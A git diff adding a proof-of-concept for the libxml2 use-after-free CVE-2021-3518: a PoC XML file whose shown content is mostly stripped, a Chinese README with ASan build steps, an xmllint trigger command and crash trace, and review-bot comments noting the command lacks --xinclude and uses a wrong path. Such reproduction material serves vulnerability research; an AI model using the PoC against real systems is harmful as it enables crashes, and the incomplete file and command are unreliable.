diff --git a/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc b/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc
new file mode 100644
index 0000000000000000000000000000000000000000..23f24f27d04e18111d3e585192e882f3a2f34aa3
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3518/CVE-2021-3518-poc
@@ -0,0 +1,7 @@
+ + + +]> + +&draft.month;
\ No newline at end of file
diff --git a/cve/libxml2/2021/CVE-2021-3518/README.md b/cve/libxml2/2021/CVE-2021-3518/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d98097843504926d9221bbfc491f01429ccdf5d0
--- /dev/null
+++ b/cve/libxml2/2021/CVE-2021-3518/README.md
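Review bot: Of the PoC's seven added lines only `]>` and the entity reference `&draft.month;` carry visible content; the DOCTYPE and ENTITY declarations that the README's trace shows being parsed (xmlParseInternalSubset → xmlParseEntityDecl) and whatever markup the XInclude pass walks are not visible in this hunk. That is most likely this page's rendering stripping angle-bracket markup rather than the committed bytes, but if the file really is a handful of near-empty lines it cannot reach xmlXIncludeDoProcess and the declarations need to be restored. Please confirm the committed file is intact, and since an extension-less file is easy to mangle in transit, consider naming its contents in one sentence in the README (the entity it declares and the element that references it) so a reader can check the file without re-deriving it from the trace.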
@@ -0,0 +1,93 @@
+## 漏洞验证
+### 下载源码
+https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1)
+
+### 编译
+```bash
+$ cd libxml2
+#下载编译依赖
+$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev
+#开启-ggdb -fsanitize=address
+$ CFLAGS="-ggdb -fsanitize=address" ./configure
+#编译
+$ make
+```
+
+### 漏洞复现
+```bash
+$ ./xmllint --recover --dropdtd --nofixup-base-uris ../CVE/CVE-2021-3518-poc
+=================================================================
+==17810==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000000048 at pc 0x7f9e25e7bbaf bp 0x7ffe68ab7bd0 sp 0x7ffe68ab7bc0
+READ of size 4 at 0x60d000000048 thread T0
+ #0 0x7f9e25e7bbae in xmlXIncludeDoProcess /data1/libxml2-openkylin-yangtze/xinclude.c:2400
+ #1 0x7f9e25e7c333 in xmlXIncludeProcessTreeFlagsData__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2503
+ #2 0x7f9e25e7c3ea in xmlXIncludeProcessFlagsData__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2532
+ #3 0x7f9e25e7c415 in xmlXIncludeProcessFlags__internal_alias /data1/libxml2-openkylin-yangtze/xinclude.c:2547
+ #4 0x561f0568ebcb in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2423
+ #5 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #6 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+ #7 0x561f05686aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed)
+
+0x60d000000048 is located 8 bytes inside of 136-byte region [0x60d000000040,0x60d0000000c8)
+freed by thread T0 here:
+ #0 0x7f9e2620f7cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
+ #1 0x7f9e25ccc808 in xmlFreeEntity /data1/libxml2-openkylin-yangtze/entities.c:145
+ #2 0x7f9e25cd0662 in xmlFreeEntityWrapper /data1/libxml2-openkylin-yangtze/entities.c:890
+ #3 0x7f9e25d8e2a2 in xmlHashFree__internal_alias /data1/libxml2-openkylin-yangtze/hash.c:346
+ #4 0x7f9e25cd0688 in xmlFreeEntitiesTable__internal_alias /data1/libxml2-openkylin-yangtze/entities.c:901
+ #5 0x7f9e25d65a11 in xmlFreeDtd__internal_alias /data1/libxml2-openkylin-yangtze/tree.c:1146
+ #6 0x561f0568eb91 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2414
+ #7 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #8 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+
+previously allocated by thread T0 here:
+ #0 0x7f9e2620fbc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
+ #1 0x7f9e25ccc865 in xmlCreateEntity /data1/libxml2-openkylin-yangtze/entities.c:159
+ #2 0x7f9e25cccfd7 in xmlAddEntity /data1/libxml2-openkylin-yangtze/entities.c:241
+ #3 0x7f9e25ccd548 in xmlAddDocEntity__internal_alias /data1/libxml2-openkylin-yangtze/entities.c:372
+ #4 0x7f9e25fcfe5f in xmlSAX2EntityDecl__internal_alias /data1/libxml2-openkylin-yangtze/SAX2.c:677
+ #5 0x7f9e25d13253 in xmlParseEntityDecl__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:5458
+ #6 0x7f9e25d224a7 in xmlParseMarkupDecl__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:6813
+ #7 0x7f9e25d2c433 in xmlParseInternalSubset /data1/libxml2-openkylin-yangtze/parser.c:8300
+ #8 0x7f9e25d42e8f in xmlParseDocument__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:10716
+ #9 0x7f9e25d5fdcb in xmlDoRead /data1/libxml2-openkylin-yangtze/parser.c:15221
+ #10 0x7f9e25d5ffdf in xmlReadFile__internal_alias /data1/libxml2-openkylin-yangtze/parser.c:15283
+ #11 0x561f0568eb01 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2388
+ #12 0x561f05696cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728
+ #13 0x7f9e25a730b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
+
+SUMMARY: AddressSanitizer: heap-use-after-free /data1/libxml2-openkylin-yangtze/xinclude.c:2400 in xmlXIncludeDoProcess
+Shadow bytes around the buggy address:
+ 0x0c1a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c1a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c1a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c1a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c1a7fff8000: fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd
+ 0x0c1a7fff8010: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
+ 0x0c1a7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c1a7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c1a7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==17810==ABORTING
+```
\ No newline at end of file
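Review bot: The reproduction command `./xmllint --recover --dropdtd --nofixup-base-uris ../CVE/CVE-2021-3518-poc` does not enable XInclude processing, yet frames #3–#4 of the recorded trace show xmlXIncludeProcessFlags being called from parseAndPrintFile, which xmllint only does when `--xinclude` is given; as written the command should not reach xinclude.c:2400, so the README cannot be followed to reproduce the ASan report it quotes. The trace itself is consistent with the upstream description of this CVE (a use-after-free with `xmllint --xinclude --dropdtd`, as I recall the fix commit): the free site is xmlFreeDtd → xmlFreeEntitiesTable → xmlFreeEntity at xmllint.c:2414 and the use site is xmlXIncludeDoProcess at xmllint.c:2423, i.e. the DTD and its entities are dropped before the XInclude pass walks the tree that still references them. Change the command to `$ ./xmllint --xinclude --recover --dropdtd --nofixup-base-uris ./CVE-2021-3518-poc`, and note that `../CVE/` does not match where the PoC lives in this commit (same directory as the README), so a reader copying the line verbatim gets a file-not-found instead of the crash. One sentence above the trace naming the root cause would also help, e.g. `--dropdtd frees the DTD and its entity table after parsing, leaving the entity reference node that XInclude processing later dereferences dangling.`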